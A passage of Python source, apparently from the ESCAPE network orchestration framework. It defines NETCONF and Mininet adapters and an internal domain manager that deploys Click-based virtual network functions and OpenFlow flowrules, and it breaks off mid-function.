from escape.adapt import log
from escape.infr.il_API import InfrastructureLayerAPI
from escape.nffg_lib import NFFG
from escape.util.conversion import NFFGConverter
from escape.util.domain import AbstractESCAPEAdapter, VNFStarterAPI, \
AbstractDomainManager, DomainChangedEvent
from escape.util.misc import VERBOSE
from escape.util.netconf import AbstractNETCONFAdapter
from pox.lib.util import dpid_to_str
class VNFStarterAdapter(AbstractNETCONFAdapter, AbstractESCAPEAdapter,
VNFStarterAPI):
"""
This class is devoted to provide NETCONF specific functions for vnf_starter
module. Documentation is transferred from `vnf_starter.yang`.
This class is devoted to start and stop CLICK-based VNFs that will be
connected to a mininet switch.
Follows the MixIn design pattern approach to support NETCONF functionality.
"""
RPC_NAMESPACE = u'http://csikor.tmit.bme.hu/netconf/unify/vnf_starter'
name = "VNFStarter"
type = AbstractESCAPEAdapter.TYPE_MANAGEMENT
# RPC namespace
# Adapter name used in CONFIG and ControllerAdapter class
def __init__ (self, *args, **kwargs):
"""
Init.
:param server: server address
:type server: str
:param port: port number
:type port: int
:param username: username
:type username: str
:param password: password
:type password: str
:param timeout: connection timeout (default=30)
:type timeout: int
:return: None
"""
# Call base constructors directly to avoid super() and MRO traps
AbstractNETCONFAdapter.__init__(self, *args, **kwargs)
AbstractESCAPEAdapter.__init__(self, *args, **kwargs)
log.debug(
"Init VNFStarterAdapter - type: %s, params: %s" % (self.type, kwargs))
def check_domain_reachable (self):
"""
Checker function for domain polling.
:return: the domain is detected or not
:rtype: bool
"""
try:
return self.get(expr="vnf_starter/agent_name") is not None
except:
# in case of RPCError, TransportError, OperationError
return False
def get_topology_resource (self):
"""
Return with the topology description as an :class:`NFFG`.
:return: the emulated topology description
:rtype: :class:`NFFG`
"""
raise RuntimeError("VNFStarterAdapter does not support this function: "
"get_topology_resource() !")
def update_connection_params (self, **kwargs):
"""
Update connection params.
:return: only updated params
:rtype: dict
"""
for param in ('server', 'port', 'username', 'password'):
if param in kwargs:
if kwargs[param] == getattr(self, param):
del kwargs[param]
else:
setattr(self, param, kwargs[param])
return kwargs
def _invoke_rpc (self, request_data):
"""
Override parent function to catch and log exceptions gracefully.
:return: None
"""
try:
return super(VNFStarterAdapter, self)._invoke_rpc(request_data)
except NCClientError as e:
log.error("Failed to invoke NETCONF based RPC! Cause: %s", e)
raise
##############################################################################
# RPC calls starts here
##############################################################################
def initiateVNF (self, vnf_type, vnf_description=None, options=None):
"""
This RCP will start a VNF.
0. initiate new VNF (initiate datastructure, generate unique ID)
1. set its arguments (control port, control ip, and VNF type/command)
2. returns the connection data, which from the vnf_id is the most important
Reply structure:
.. code-block:: json
{
"access_info":
{
"vnf_id": "<mandatory>",
"control_ip": "<optional>",
"control_port": "<optional>"
},
"other": "<optional>"
}
:param vnf_type: pre-defined VNF type (see in vnf_starter/available_vnfs)
:type vnf_type: str
:param vnf_description: Click description if there are no pre-defined type
:type vnf_description: str
:param options: unlimited list of additional options as name-value pairs
:type options: collections.OrderedDict
:return: RPC reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call initiateVNF - VNF type: %s" % vnf_type)
return self.call_RPC("initiateVNF", vnf_type=vnf_type,
vnf_description=vnf_description, options=options)
def connectVNF (self, vnf_id, vnf_port, switch_id):
"""
This RPC will practically start and connect the initiated VNF/CLICK to
the switch.
0. create virtualEthernet pair(s)
1. connect either end of it (them) to the given switch(es)
Reply structure:
.. code-block:: json
{
"port": "<mandatory> # Currently just got RPC OK",
"other": "<optional>"
}
This RPC is also used for reconnecting a VNF. In this case, however,
if the input fields are not correctly set an error occurs
:param vnf_id: VNF ID (mandatory)
:type vnf_id: str
:param vnf_port: VNF port (mandatory)
:type vnf_port: str or int
:param switch_id: switch ID (mandatory)
:type switch_id: str
:return: Returns the connected port(s) with the corresponding switch(es).
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call connectVNF - VNF id: %s port: %s --> node: %s" % (
vnf_id, vnf_port, switch_id))
return self.call_RPC("connectVNF", vnf_id=vnf_id, vnf_port=vnf_port,
switch_id=switch_id)
def disconnectVNF (self, vnf_id, vnf_port):
"""
This RPC will disconnect the VNF(s)/CLICK(s) from the switch(es).
0. ip link set uny_0 down
1. ip link set uny_1 down
2. (if more ports) repeat 1. and 2. with the corresponding data
Reply structure:
.. code-block:: json
{
"other": "<optional> # Currently just got RPC OK"
}
:param vnf_id: VNF ID (mandatory)
:type vnf_id: str
:param vnf_port: VNF port (mandatory)
:type vnf_port: str
:return: reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call disconnectVNF - VNF id: %s port: %s" % (vnf_id, vnf_port))
return self.call_RPC("disconnectVNF", vnf_id=vnf_id, vnf_port=vnf_port)
def startVNF (self, vnf_id):
"""
This RPC will actually start the VNF/CLICK instance.
Reply structure:
.. code-block:: json
{
"other": "<optional> # Currently just got RPC OK"
}
:param vnf_id: VNF ID (mandatory)
:type vnf_id: str
:return: reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call startVNF - VNF id: %s" % vnf_id)
return self.call_RPC("startVNF", vnf_id=vnf_id)
def stopVNF (self, vnf_id):
"""
This RPC will gracefully shut down the VNF/CLICK instance.
0. if disconnect() was not called before, we call it
1. delete virtual ethernet pairs
2. stop (kill) click
3. remove vnf's data from the data structure
Reply structure:
.. code-block:: json
{
"other": "<optional> # Currently just got RPC OK"
}
:param vnf_id: VNF ID (mandatory)
:type vnf_id: str
:return: reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call stopVNF - VNF id: %s" % vnf_id)
return self.call_RPC("stopVNF", vnf_id=vnf_id)
def getVNFInfo (self, vnf_id=None):
"""
This RPC will send back all data of all VNFs that have been initiated by
this NETCONF Agent. If an input of vnf_id is set, only that VNF's data
will be sent back. Most of the data this RPC replies is used for DEBUG,
however 'status' is useful for indicating to upper layers whether a VNF
is UP_AND_RUNNING.
Reply structure:
.. code-block:: json
{
"initiated_vnfs":
{
"vnf_id": "<initiated_vnfs key>",
"pid": "<VNF PID>",
"control_ip": "<cntr IP>",
"control_port": "<cntr port>",
"command": "<VNF init command>",
"link":
[
{
"vnf_port": "<port of VNF end>",
"vnf_dev": "<VNF end intf>",
"vnf_dev_mac": "<VNF end MAC address>",
"sw_dev": "<switch/EE end intf>",
"sw_id": "<switch/EE end id>",
"sw_port": "<switch/EE end port>",
"connected": "<conn status>"
}
],
"other": "<optional>"
}
}
:param vnf_id: VNF ID (default: list info about all VNF)
:type vnf_id: str
:return: reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug(
"Call getVNFInfo - VNF id: %s" % vnf_id if vnf_id is not None else "all")
return self.call_RPC('getVNFInfo', vnf_id=vnf_id)
##############################################################################
# High-level helper functions
##############################################################################
def deployNF (self, nf_type, nf_ports, infra_id, nf_desc=None, nf_opt=None):
"""
Initiate and start the given NF using the general RPC calls.
:param nf_type: pre-defined NF type (see in vnf_starter/available_vnfs)
:type nf_type: str
:param nf_ports: NF port number or list of ports (mandatory)
:type nf_ports: str or int or tuple
:param infra_id: id of the base node (mandatory)
:type infra_id: str
:param nf_desc: Click description if there are no pre-defined type
:type nf_desc: str
:param nf_opt: unlimited list of additional options as name-value pairs
:type nf_opt: collections.OrderedDict
:return: initiated NF description parsed from RPC reply
:rtype: dict
"""
with self as adapter:
try:
# Initiate VNF
reply = adapter.initiateVNF(vnf_type=nf_type, vnf_description=nf_desc,
options=nf_opt)
# Get created VNF's id
vnf_id = reply['access_info']['vnf_id']
# Connect VNF to the given Container
if isinstance(nf_ports, (tuple, list)):
for port in nf_ports:
adapter.connectVNF(vnf_id=vnf_id, vnf_port=port, switch_id=infra_id)
else:
adapter.connectVNF(vnf_id=vnf_id, vnf_port=nf_ports,
switch_id=infra_id)
# Start Click-based VNF
adapter.startVNF(vnf_id=vnf_id)
# Return with whole VNF description
return adapter.getVNFInfo(vnf_id=vnf_id)
except RPCError:
log.error("Got Error during deployVNF through NETCONF:")
raise
except KeyError as e:
log.warning(
"Missing required attribute from NETCONF-based RPC reply: %s! Skip "
"VNF initiation." % e.args[0])
except (TransportError, OperationError) as e:
log.error(
"Failed to deploy NF due to a connection error! Cause: %s" % e)
def removeNF (self, vnf_id):
"""
Stop and remove the given NF using the general RPC calls.
:return: reply data
:rtype: dict
"""
with self as adapter:
try:
# Stop and remove VNF
return adapter.stopVNF(vnf_id=vnf_id)
except RPCError:
log.error("Got Error during removeVNF through NETCONF:")
raise
except KeyError as e:
log.warning(
"Missing required attribute from NETCONF-based RPC reply: %s! Skip "
"VNF initiation." % e.args[0])
except (TransportError, OperationError) as e:
log.error(
"Failed to remove NF due to a connection error! Cause: %s" % e)
class InternalMininetAdapter(AbstractESCAPEAdapter):
"""
Adapter class to handle communication with Mininet domain.
Implement VNF managing API using direct access to the
:class:`mininet.net.Mininet` object.
"""
# Events raised by this class
_eventMixin_events = {DomainChangedEvent}
name = "MININET"
type = AbstractESCAPEAdapter.TYPE_TOPOLOGY
def __init__ (self, net=None, *args, **kwargs):
"""
Init.
:param net: set pre-defined network (optional)
:type net: :class:`ESCAPENetworkBridge`
"""
# Call base constructors directly to avoid super() and MRO traps
AbstractESCAPEAdapter.__init__(self, *args, **kwargs)
log.debug(
"Init InternalMininetAdapter - type: %s, domain: %s, initial network: "
"%s" % (self.type, self.domain_name, net))
if not net:
from pox import core
if core.core.hasComponent(InfrastructureLayerAPI._core_name):
# reference to MN --> ESCAPENetworkBridge
self.__IL_topo_ref = core.core.components[
InfrastructureLayerAPI._core_name].topology
if self.__IL_topo_ref is None:
log.error("Unable to get emulated network reference!")
def get_mn_wrapper (self):
"""
Return the specific wrapper for :class:`mininet.net.Mininet` object
represents the emulated network.
:return: emulated network wrapper
:rtype: :any:`ESCAPENetworkBridge`
"""
return self.__IL_topo_ref
def check_domain_reachable (self):
"""
Checker function for domain polling.
:return: the domain is detected or not
:rtype: bool
"""
# Direct access to IL's Mininet wrapper <-- Internal Domain
return self.__IL_topo_ref.started
def get_topology_resource (self):
"""
Return with the topology description as an :class:`NFFG`.
:return: the emulated topology description
:rtype: :class:`NFFG`
"""
# Direct access to IL's Mininet wrapper <-- Internal Domain
return self.rewrite_domain(
self.__IL_topo_ref.topo_desc) if self.__IL_topo_ref.started else None
def get_agent_connection_params (self, ee_name):
"""
Return the connection parameters for the agent of the switch given by the
``switch_name``.
:param ee_name: name of the container Node
:type ee_name: str
:return: connection params
:rtype: dict
"""
agent = self.__IL_topo_ref.get_agent_to_switch(ee_name)
return {"server": "127.0.0.1", "port": agent.agentPort,
"username": agent.username,
"password": <PASSWORD>} if agent is not None else {}
class InternalDomainManager(AbstractDomainManager):
"""
Manager class to handle communication with internally emulated network.
.. note::
Uses :class:`InternalMininetAdapter` for managing the emulated network and
:class:`InternalPOXAdapter` for controlling the network.
.. deprecated::
No longer maintained!
"""
# DomainManager name
name = "INTERNAL"
# Default domain name
DEFAULT_DOMAIN_NAME = "INTERNAL"
# Set the internal manager status
IS_INTERNAL_MANAGER = True
def __init__ (self, domain_name=DEFAULT_DOMAIN_NAME, *args, **kwargs):
"""
Init.
:param domain_name: the domain name
:type domain_name: str
:param args: optional param list
:type args: list
:param kwargs: optional keywords
:type kwargs: dict
:return: None
"""
log.debug("Create InternalDomainManager with domain name: %s" % domain_name)
super(InternalDomainManager, self).__init__(domain_name=domain_name,
*args, **kwargs)
self.controlAdapter = None # DomainAdapter for POX-InternalPOXAdapter
self.topoAdapter = None # DomainAdapter for Mininet-InternalMininetAdapter
self.remoteAdapter = None # NETCONF communication - VNFStarterAdapter
self.portmap = {} # Map (unique) dynamic ports to physical ports in EEs
self.deployed_vnfs = {} # container for replied NETCONF messages of
# deployNF, key: (infra_id, nf_id), value: initiated_vnf part of the
# parsed reply in JSON
self.sapinfos = {}
# Mapper structure for non-integer link id
self.vlan_register = {}
def init (self, configurator, **kwargs):
"""
Initialize Internal domain manager.
:param configurator: component configurator for configuring adapters
:type configurator: :any:`ComponentConfigurator`
:param kwargs: optional parameters
:type kwargs: dict
:return: None
"""
# Call abstract init to execute common operations
super(InternalDomainManager, self).init(configurator, **kwargs)
self._collect_SAP_infos()
self._setup_sap_hostnames()
self.log.info("DomainManager for %s domain has been initialized!" %
self.domain_name)
def initiate_adapters (self, configurator):
"""
Initiate adapters.
:param configurator: component configurator for configuring adapters
:type configurator: :any:`ComponentConfigurator`
:return: None
"""
# Initiate Adapters
self.topoAdapter = configurator.load_component(
component_name=AbstractESCAPEAdapter.TYPE_TOPOLOGY,
parent=self._adapters_cfg)
# Init adapter for internal controller: POX
self.controlAdapter = configurator.load_component(
component_name=AbstractESCAPEAdapter.TYPE_CONTROLLER,
parent=self._adapters_cfg)
self.log.debug("Set %s as the topology Adapter for %s" % (
self.topoAdapter.__class__.__name__,
self.controlAdapter.__class__.__name__))
# Init default NETCONF adapter
self.remoteAdapter = configurator.load_component(
component_name=AbstractESCAPEAdapter.TYPE_MANAGEMENT,
parent=self._adapters_cfg)
def finit (self):
"""
Stop polling and release dependent components.
:return: None
"""
super(InternalDomainManager, self).finit()
self.remoteAdapter.finit()
self.controlAdapter.finit()
self.topoAdapter.finit()
@property
def controller_name (self):
"""
Return with the name of the controller name.
:return: controller name
:rtype: str
"""
return self.controlAdapter.task_name
def _setup_sap_hostnames (self):
"""
Setup hostnames in /etc/hosts for SAPs.
:return: None
"""
# Update /etc/hosts with hostname - IP address mapping
import os
os.system("sed '/# BEGIN ESCAPE SAPS/,/# END ESCAPE SAPS/d' "
"/etc/hosts > /etc/hosts2")
os.system("mv /etc/hosts2 /etc/hosts")
hosts = "# BEGIN ESCAPE SAPS \n"
for sap, info in self.sapinfos.iteritems():
hosts += "%s %s \n" % (info['nw_dst'], sap)
hosts += "# END ESCAPE SAPS \n"
with open('/etc/hosts', 'a') as f:
f.write(hosts)
self.log.debug("Setup SAP hostnames: %s" % "; ".join(
["%s --> %s" % (sap, info['nw_dst']) for sap, info in
self.sapinfos.iteritems()]))
def _collect_SAP_infos (self):
"""
Collect necessary information from SAPs for traffic steering.
:return: None
"""
log.debug("Collect SAP info...")
mn = self.topoAdapter.get_mn_wrapper().network
topo = self.topoAdapter.get_topology_resource()
if topo is None or mn is None:
self.log.error("Missing topology description from topology Adapter! "
"Skip SAP data discovery.")
for sap in topo.saps:
# skip inter-domain SAPs
if sap.binding is not None:
continue
connected_node = [(v, link.dst.id) for u, v, link in
topo.real_out_edges_iter(sap.id)]
if len(connected_node) > 1:
self.log.warning("%s is connection to multiple nodes (%s)!" % (
sap, [n[0] for n in connected_node]))
for node in connected_node:
mac = mn.getNodeByName(sap.id).MAC()
ip = mn.getNodeByName(sap.id).IP()
self.log.debug("Detected IP(%s) | MAC(%s) for %s connected to Node(%s) "
"on port: %s" % (ip, mac, sap, node[0], node[1]))
if node[0] not in self.controlAdapter.saps:
self.controlAdapter.saps[node[0]] = {}
sapinfo = {'dl_src': "ff:ff:ff:ff:ff:ff",
'dl_dst': str(mac),
'nw_dst': str(ip)}
self.controlAdapter.saps[node[0]][str(node[1])] = sapinfo
self.sapinfos[str(sap.id)] = sapinfo
def install_nffg (self, nffg_part):
"""
Install an :class:`NFFG` related to the internal domain.
:param nffg_part: NF-FG need to be deployed
:type nffg_part: :class:`NFFG`
:return: installation was success or not
:rtype: bool
"""
self.log.info(">>> Install %s domain part..." % self.domain_name)
try:
# Mininet domain does not support NF migration directly -->
# Remove unnecessary and moved NFs first
result = [
self._delete_running_nfs(nffg=nffg_part),
# then (re)initiate mapped NFs
self._deploy_new_nfs(nffg=nffg_part)
]
if not all(result):
self.log.warning("Skip traffic steering due to NF initiation error(s)!")
return all(result)
self.log.info(
"Perform traffic steering according to mapped tunnels/labels...")
# OpenFlow flowrule deletion/addition is fairly cheap operations
# The most robust solution is to delete every flowrule
result.extend((self._delete_flowrules(nffg=nffg_part),
# and (re)add the new ones
self._deploy_flowrules(nffg_part=nffg_part)))
return all(result)
except:
self.log.exception("Got exception during NFFG installation into: %s." %
self.domain_name)
return False
def clear_domain (self):
"""
Infrastructure Layer has already been stopped and probably cleared.
Skip cleanup process here.
:return: cleanup result
:rtype: bool
"""
if not self.topoAdapter.check_domain_reachable():
# This would be the normal behaviour if ESCAPEv2 is shutting down -->
# Infrastructure layer has been cleared.
self.log.debug("%s domain has already been cleared!" % self.domain_name)
return True
result = (self._delete_running_nfs(), # Just for sure remove NFs
self._delete_flowrules()) # and flowrules
return all(result)
def reset_domain (self):
self.clear_domain()
def _delete_running_nfs (self, nffg=None):
"""
Stop and delete deployed NFs which are not existed the new mapped request.
Mininet domain does not support NF migration and assume stateless network
functions.
Detect if an NF was moved during the previous mapping and
remove that gracefully.
If the ``nffg`` parameter is not given, skip the NF migration detection
and remove all non-existent NF by default.
:param nffg: the last mapped NFFG part
:type nffg: :class:`NFFG`
:return: deletion was successful or not
:rtype: bool
"""
result = True
topo = self.topoAdapter.get_topology_resource()
if topo is None:
self.log.warning("Missing topology description from %s domain! "
"Skip deleting NFs..." % self.domain_name)
return False
self.log.debug("Check for removable NFs...")
# Skip non-execution environments
infras = [i.id for i in topo.infras if
i.infra_type in (NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE)]
for infra_id in infras:
# Generate list of newly mapped NF on the infra
old_running_nfs = [n.id for n in topo.running_nfs(infra_id)]
# Detect non-moved NF if new mapping was given and skip deletion
for nf_id in old_running_nfs:
# If NF exist in the new mapping
if nffg is not None and nf_id in nffg:
new_running_nfs = [n.id for n in nffg.running_nfs(infra_id)]
# And connected to the same infra
if nf_id in new_running_nfs:
# NF was not moved, Skip deletion
self.log.debug('Unchanged NF: %s' % nf_id)
continue
# If the NF exists in the new mapping, but moved to another infra
else:
self.log.info("Found moved NF: %s")
self.log.debug(
"NF migration is not supported! Stop and remove already "
"deployed NF and reinitialize later...")
else:
self.log.debug("Found removable NF: %s" % nf_id)
# Create connection Adapter to EE agent
connection_params = self.topoAdapter.get_agent_connection_params(
infra_id)
if connection_params is None:
self.log.error("Missing connection params for communication with the "
"agent of Node: %s" % infra_id)
result = False
continue
updated = self.remoteAdapter.update_connection_params(
**connection_params)
if updated:
self.log.debug("Update connection params in %s: %s" % (
self.remoteAdapter.__class__.__name__, updated))
self.log.debug("Stop deployed NF: %s" % nf_id)
try:
vnf_id = self.deployed_vnfs[(infra_id, nf_id)]['vnf_id']
reply = self.remoteAdapter.removeNF(vnf_id=vnf_id)
self.log.log(VERBOSE,
"Removed NF status:\n%s" % pprint.pformat(reply))
# Remove NF from deployed cache
del self.deployed_vnfs[(infra_id, nf_id)]
# Delete infra ports connected to the deletable NF
for u, v, link in topo.network.out_edges([nf_id], data=True):
topo[v].del_port(id=link.dst.id)
# Delete NF
topo.del_node(nf_id)
except KeyError:
self.log.error("Deployed VNF data for NF: %s is not found! "
"Skip deletion..." % nf_id)
result = False
continue
except NCClientError as e:
self.log.error("Got NETCONF RPC communication error during NF: %s "
"deletion! Skip deletion..." % nf_id)
self.log.error(VERBOSE, "Exception: %s" % e)
result = False
continue
self.log.debug("NF deletion result: %s" %
("SUCCESS" if result else "FAILURE"))
return result
def _deploy_new_nfs (self, nffg):
"""
Install the NFs mapped in the given NFFG.
If an NF is already defined in the topology and it's state is up and
running then the actual NF's initiation will be skipped!
:param nffg: container NF-FG part need to be deployed
:type nffg: :class:`NFFG`
:return: deploy was successful or not
:rtype: bool
"""
self.log.info("Deploy mapped NFs into the domain: %s..." % self.domain_name)
result = True
self.portmap.clear()
# Remove unnecessary SG and Requirement links to avoid mess up port
# definition of NFs
nffg.clear_links(NFFG.TYPE_LINK_SG)
nffg.clear_links(NFFG.TYPE_LINK_REQUIREMENT)
# Get physical topology description from Mininet
mn_topo = self.topoAdapter.get_topology_resource()
if mn_topo is None:
self.log.warning("Missing topology description from %s domain! "
"Skip deploying NFs..." % self.domain_name)
return False
# Iter through the container INFRAs in the given mapped NFFG part
# print mn_topo.dump()
for infra in nffg.infras:
if infra.infra_type not in (
NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE):
self.log.debug(
"Infrastructure Node: %s (type: %s) is not Container type! "
"Continue to next Node..." % (infra.id, infra.infra_type))
continue
else:
self.log.debug("Check NFs mapped on Node: %s" % infra.id)
# If the actual INFRA isn't in the topology(NFFG) of this domain -> skip
if infra.id not in (n.id for n in self.internal_topo.infras):
self.log.error("Infrastructure Node: %s is not found in the %s domain! "
"Skip NF initiation on this Node..." %
(infra.id, self.domain_name))
result = False
continue
# Iter over the NFs connected the actual INFRA
for nf in nffg.running_nfs(infra.id):
# NF with id is already deployed --> change the dynamic port to
# static and continue
if nf.id in (nf.id for nf in self.internal_topo.nfs):
self.log.debug("NF: %s has already been initiated! "
"Continue to next NF..." % nf.id)
for u, v, link in nffg.real_out_edges_iter(nf.id):
dyn_port = nffg[v].ports[link.dst.id]
for x, y, l in mn_topo.real_out_edges_iter(nf.id):
if l.src.id == link.src.id:
self.portmap[dyn_port.id] = l.dst.id
dyn_port.id = l.dst.id
break
continue
# Extract the initiation params
params = {'nf_type': nf.functional_type,
'nf_ports': [link.src.id for u, v, link in
nffg.real_out_edges_iter(nf.id)],
'infra_id': infra.id}
# Check if every param is not None or empty
if not all(params.values()):
self.log.error("Missing arguments for initiation of NF: %s! "
"Extracted params: %s" % (nf.id, params))
result = False
continue
# Create connection Adapter to EE agent
connection_params = self.topoAdapter.get_agent_connection_params(
infra.id)
if connection_params is None:
self.log.error("Missing connection params for communication with the "
"agent of Node: %s" % infra.id)
result = False
continue
# Save last used adapter --> and last RPC result
self.log.info("Initiating NF: %s ..." % nf.id)
self.log.debug("NF parameters: %s" % params)
updated = self.remoteAdapter.update_connection_params(
**connection_params)
if updated:
self.log.debug("Update connection params in %s: %s" % (
self.remoteAdapter.__class__.__name__, updated))
try:
vnf = self.remoteAdapter.deployNF(**params)
except NCClientError as e:
self.log.error("Got NETCONF RPC communication error during NF: %s "
"deploy! Skip deploy..." % nf.id)
self.log.error(VERBOSE, "Exception: %s" % e)
result = False
continue
except BaseException:
self.log.error("Got unexpected error during NF: %s "
"initiation! Skip initiation..." % nf.name)
result = False
continue
self.log.log(VERBOSE, "Initiated VNF:\n%s" % pprint.pformat(vnf))
# Check if NETCONF communication was OK
if vnf and 'initiated_vnfs' in vnf and vnf['initiated_vnfs']['pid'] \
and vnf['initiated_vnfs']['status'] == \
VNFStarterAPI.VNFStatus.s_UP_AND_RUNNING:
self.log.info("NF: %s initiation has been verified on Node: %s" % (
nf.id, infra.id))
self.log.debug("Initiated VNF id: %s, PID: %s, status: %s" % (
vnf['initiated_vnfs']['vnf_id'], vnf['initiated_vnfs']['pid'],
vnf['initiated_vnfs']['status']))
else:
self.log.error("Initiated NF: %s is not verified. Initiation was "
"unsuccessful!" % nf.id)
result = False
continue
# Store NETCONF related info of deployed NF
self.deployed_vnfs[(infra.id, nf.id)] = vnf['initiated_vnfs']
# Add initiated NF to topo description
self.log.debug("Update Infrastructure layer topology description...")
deployed_nf = nf.copy()
deployed_nf.ports.clear()
mn_topo.add_nf(nf=deployed_nf)
self.log.debug("Add deployed NFs to topology...")
# Add Link between actual NF and INFRA
for nf_id, infra_id, link in nffg.real_out_edges_iter(nf.id):
# Get Link's src ref to new NF's port
nf_port = deployed_nf.ports.append(nf.ports[link.src.id].copy())
def get_sw_port (vnf):
"""
Return the switch port parsed from result of getVNFInfo
:param vnf: VNF description returned by NETCONF server
:type vnf: dict
:return: port id
:rtype: int
"""
if isinstance(vnf['initiated_vnfs']['link'], list):
for _link in vnf['initiated_vnfs']['link']:
if str(_link['vnf_port']) == str(nf_port.id):
return int(_link['sw_port'])
else:
return int(vnf['initiated_vnfs']['link']['sw_port'])
# Get OVS-generated physical port number
infra_port_num = get_sw_port(vnf)
if infra_port_num is None:
self.log.warning("Can't get Container port from RPC result! Set "
"generated port number...")
# Create INFRA side Port
infra_port = mn_topo.network.node[infra_id].add_port(
id=infra_port_num)
self.log.debug("%s - detected physical %s" %
(deployed_nf, infra_port))
# Add Links to mn topo
mn_topo.add_undirected_link(port1=nf_port, port2=infra_port,
dynamic=True, delay=link.delay,
bandwidth=link.bandwidth)
# Port mapping
dynamic_port = nffg.network.node[infra_id].ports[link.dst.id].id
self.portmap[dynamic_port] = infra_port_num
# Update port in nffg_part
nffg.network.node[infra_id].ports[
link.dst.id].id = infra_port_num
self.log.debug("%s topology description is updated with NF: %s" % (
self.domain_name, deployed_nf.name))
self.log.debug("Rewrite dynamically generated port numbers in flowrules...")
# Update port numbers in flowrules
for infra in nffg.infras:
if infra.infra_type not in (
NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE,
NFFG.TYPE_INFRA_SDN_SW):
continue
# If the actual INFRA isn't in the topology(NFFG) of this domain -> skip
if infra.id not in (n.id for n in mn_topo.infras):
continue
for port in infra.ports:
for flowrule in port.flowrules:
_match = flowrule.match.split(';')
if not _match[0].startswith("in_port="):
self.log.warning("Missing 'in_port' from match field: %s" %
flowrule.match)
continue
_action = flowrule.action.split(';')
if not _action[0].startswith("output="):
self.log.warning("Missing 'output' from action field: %s" %
flowrule.action)
continue
for dyn, phy in self.portmap.iteritems():
_match[0] = _match[0].replace(str(dyn), str(phy))
_action[0] = _action[0].replace(str(dyn), str(phy))
flowrule.match = ";".join(_match)
flowrule.action = ";".join(_action)
if result:
self.log.info("Initiation of NFs in NFFG part: %s has been finished! "
"Result: SUCCESS" % nffg)
else:
self.log.info("Initiation of NFs in NFFG part: %s has been finished! "
"Result: FAILURE" % nffg)
return result
def _delete_flowrules (self, nffg=None):
"""
Delete all flowrules from the first (default) table of all infras.
:param nffg: last mapped NFFG part
:type nffg: :class:`NFFG`
:return: deletion was successful or not
:rtype: bool
"""
self.log.debug("Reset domain steering and delete installed flowrules...")
result = True
# Get topology NFFG to detect corresponding infras and skip needless infras
topo = self.topoAdapter.get_topology_resource()
if topo is None:
self.log.warning("Missing topology description from %s domain! "
"Skip flowrule deletions..." % self.domain_name)
return False
# If nffg is not given or is a bare topology, which is probably a cleanup
# topo, all the flowrules in physical topology will be removed
if nffg is None or nffg.is_bare():
self.log.debug("Detected empty request NFFG! "
"Remove all the installed flowrules...")
nffg = topo
topo_infras = [n.id for n in topo.infras]
# Iter through the container INFRAs in the given mapped NFFG part
self.log.debug("Managed topo infras: %s" % topo_infras)
for infra in nffg.infras:
self.log.debug("Process flowrules in infra: %s" % infra.id)
if infra.infra_type not in (NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE,
NFFG.TYPE_INFRA_SDN_SW):
self.log.warning("Detected virtual Infrastructure Node type: %s! "
"Skip infra node processing..." % infra.infra_type)
continue
# If the actual INFRA isn't in the topology(NFFG) of this domain -> skip
if infra.id not in topo_infras:
self.log.error("Infrastructure Node: %s is not found in the %s domain! "
"Skip flowrule deletion on this Node..." %
(infra.id, self.domain_name))
result = False
continue
try:
dpid = self.controlAdapter.infra_to_dpid[infra.id]
except KeyError as e:
self.log.warning("Missing DPID for Infra(id: %s)! Skip deletion of "
"flowrules" % e)
result = False
continue
# Check the OF connection is alive
if self.controlAdapter.openflow.getConnection(dpid) is None:
self.log.warning("Skipping DELETE flowrules! Cause: connection for %s -"
" DPID: %s is not found!" % (infra, dpid_to_str(dpid)))
result = False
continue
self.controlAdapter.delete_flowrules(infra.id)
self.log.debug("Flowrule deletion result: %s" %
("SUCCESS" if result else "FAILURE"))
return result
def _deploy_flowrules (self, nffg_part):
"""
Install the flowrules given in the NFFG.
If a flowrule is already defined it will be updated.
:param nffg_part: NF-FG part need to be deployed
:type nffg_part: :class:`NFFG`
:return: deploy was successful or not
:rtype: bool
"""
self.log.debug("Deploy flowrules into the domain: %s..." % self.domain_name)
result = True
# Remove unnecessary SG and Requirement links to avoid mess up port
# definition of NFs
nffg_part.clear_links(NFFG.TYPE_LINK_SG)
nffg_part.clear_links(NFFG.TYPE_LINK_REQUIREMENT)
# # Get physical topology description from POX adapter
# topo = self.controlAdapter.get_topology_resource()
topo = self.topoAdapter.get_topology_resource()
if topo is None:
self.log.warning("Missing topology description from %s domain! "
"Skip deploying flowrules..." % self.domain_name)
return False
# Iter through the container INFRAs in the given mapped NFFG part
for infra in nffg_part.infras:
if infra.infra_type not in (
NFFG.TYPE_INFRA_EE, NFFG.TYPE_INFRA_STATIC_EE,
NFFG.TYPE_INFRA_SDN_SW):
self.log.debug("Infrastructure Node: %s (type: %s) is not Switch or "
"Container type! Continue to next Node..." %
(infra.id, infra.infra_type))
continue
# If the actual INFRA isn't in the topology(NFFG) of this domain -> skip
if infra.id not in (n.id for n in topo.infras):
self.log.error("Infrastructure Node: %s is not found in the %s domain! "
"Skip flowrule install on this Node..." % (
infra.id, self.domain_name))
result = False
continue
try:
dpid = self.controlAdapter.infra_to_dpid[infra.id]
except KeyError as e:
self.log.warning("Missing DPID for Infra(id: %s)! "
"Skip deploying flowrules for Infra" % e)
result = False
continue
# Check the OF connection is alive
if self.controlAdapter.openflow.getConnection(dpid) is None:
self.log.warning("Skipping INSTALL flowrule! "
"Cause: connection for %s - DPID: %s is not found!" %
(infra, dpid_to_str(dpid)))
result = False
continue
for port in infra.ports:
for flowrule in port.flowrules:
try:
match = NFFGConverter.field_splitter(
type=NFFGConverter.TYPE_MATCH,
field=flowrule.match)
if "in_port" not in match:
self.log.warning("Missing in_port field from match field! "
"Using container port number...")
match["in_port"] = port.id
action = NFFGConverter.field_splitter(
type=NFFGConverter.TYPE_ACTION,
field=flowrule.action)
except RuntimeError as e:
self.log.warning("Wrong format in match/action field: %s" % e)
result = False
continue
# Process the abstract TAG in match
if 'vlan_id' in match:
self.log.debug("Process TAG: %s in match field" % match['vlan_id'])
